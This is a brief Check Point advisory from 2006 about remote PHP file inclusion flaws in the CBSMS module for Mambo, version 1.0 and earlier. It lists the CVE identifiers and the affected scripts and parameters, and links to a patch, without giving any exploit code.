Check Point Advisories

Update Protection against CBSMS Mambo Module Remote File Vulnerabilities

Check Point Reference: CPAI-2006-119
Date Published: 11 Oct 2006
Severity: Medium
Last Updated: Thursday 03 May, 2007
Source: FrSIRT/ADV-2006-2528
Industry Reference:CVE-2006-3302
CVE-2006-3294
Protection Provided by:
Who is Vulnerable? CBSMS Mambo Module version 1.0 and prior
Vulnerability Description CBSMS Module for Mambo, an Open Source Content Management System, is prone to multiple vulnerabilities. A remote attacker can exploit these vulnerabilities to execute arbitrary PHP code on an affected system.
Update/Patch AvaliableApply patch:
http://forum.mamboserver.com/showthread.php?t=83001
Vulnerability DetailsThe vulnerabilities are due to input validation errors in the "mod_cbsms_messages.php" and "mod_cbsms.php" scripts. An attacker can exploit these flaws via URLs in the "mosC_a_path" and "mosConfig_absolute_path" parameters. By doing so, the attacker could include malicious scripts and execute arbitrary commands on the vulnerable system.

Protection Overview

×
  Feedback
This website uses cookies for its functionality and for analytics and marketing purposes. By continuing to use this website, you agree to the use of cookies. For more information, please read our Cookies Notice.
OK